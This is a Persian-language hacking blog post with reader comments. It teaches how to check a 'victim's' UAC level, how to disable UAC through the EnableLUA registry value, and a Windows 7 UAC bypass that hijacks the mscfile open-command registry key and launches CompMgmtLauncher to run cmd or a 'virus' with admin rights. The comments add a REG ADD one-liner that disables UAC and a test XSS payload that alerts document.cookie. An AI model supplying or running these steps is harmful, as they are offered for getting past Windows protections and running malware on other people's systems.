UAC :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات

به نام خداوند بخشنده ی مهربان

حس حرف زدن ندارم، امروز اومدم بهتون نحوه ی تشخیص UAC قربانی و نحوه ی خاموش کردنش و یه اکسپلویت ریز هم معرفی کنم. اول بریم سراغ این که چطوری ببینیم سطح UAC قربانی مون چیه. میتونید این رو خودکار کنید که برنامتون انجام بده، برید تو مسیر زیر تو ریجیستری :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

حالا متغیر ConsentPromptBehaviorAdmin رو ببینید :

اگر 2 بود یعنی سطح بشدت بالاست

اگر 5 بود یعنی معمولی

اگر هم 0 که یعنی طرف ببو هست و خاموشه.


خب بریم خاموشش کنیم، وارد مسیر زیر بشید :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

متغیر EnableLUA رو برابر 0 بزارید و UAC طرف خاموش میشه.

بریم اون اکسپلویته رو ببینیم، روی ویندوز 7 تستش کردم(2019) ، برید توی پوشه ی system32 ویندوز و برنامه ی CompMgmtLauncher رو پیدا کنید، کاریش نکنید و برگردید تو ریجیستری، وارد مسیر زیر شید :

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\open\command

بعد متغیر دیفالت رو مقدار رو برابر زیر بزارید :

c:\Windows\System32\cmd.exe

اگر هم که قصدتون اجرای ویروس یا برنامه خاصی روی سیستم مشتریه که اینم با دستور قبلی بزارید :

/C {ادرس برنامه}

بعد برگردید به سیستم 32 و برنامه ی CompMgmtLauncher رو باز کنید. میبینید که دستور با دسترسی ادمین باز شده.

راستی، از امروز رابط گرافیکی با سی ++ رو بهتون یاد میدم.

این روی دسترسی ادمین بالا جواب نمیده!

نویسنده: Attrib 32

*باشد که رستگار شویم.*

نظر (۷)

سلام اتریب اینا رو میشه تو bat یا vbs زد یعنی وقتی زد رو فایل uac خامو بشه؟

Virus32 32 Attacker ‌ :
سلام
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

سلام این کدی که گذاشتی رو زدم پیام موفقیت داد ولی uac غیر فعال نشد

Virus32 ولم کنید (: :
امکان نداره روی ویندوز 7 و 10 چک شده.
یه نوتفیکیشن باید بیاد.

نه نوتفیکیشن اومد نه uac غیر فعال شد.

احتمال داره کد رو اشتباه زده باشین تو نظرات؟

Virus32 ولم کنید (: :
پس درسته.

اتریب فکر کنم باید به طور واضح بیان کنی دسترسی ادمین میخاد چون فکر کنم بعضی دوستان با دسترسی عادی تست کردن انجام نشده

Virus32 ولم کنید (: :
اره اکسپلویت روی دسترسی خیلی بالا جواب نمیده، روی معمولی یا خاموش.

ببخشید این مال کدوم زبان برنامه نویسیه؟

Virus32 ولم کنید (: :
هیچ زبونی
اکسپلویته
  • Virus32
  • <script>alert(document.cookie)</script>
  • به بزرگواری خودتان ببخشید خواستم تست کوجکی کنم
    Virus32 32 Attacker ‌ :
    میل باکس رو یادت رفت تست کنی.

    فیلتر بود تا اون جایی که یادمه حالم نداشتم دور بزنم سریع میخواستم برم .....😐

    الان با موبایلم بعدا سورس رو نگاه میکنم

    بازم ممنون

    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی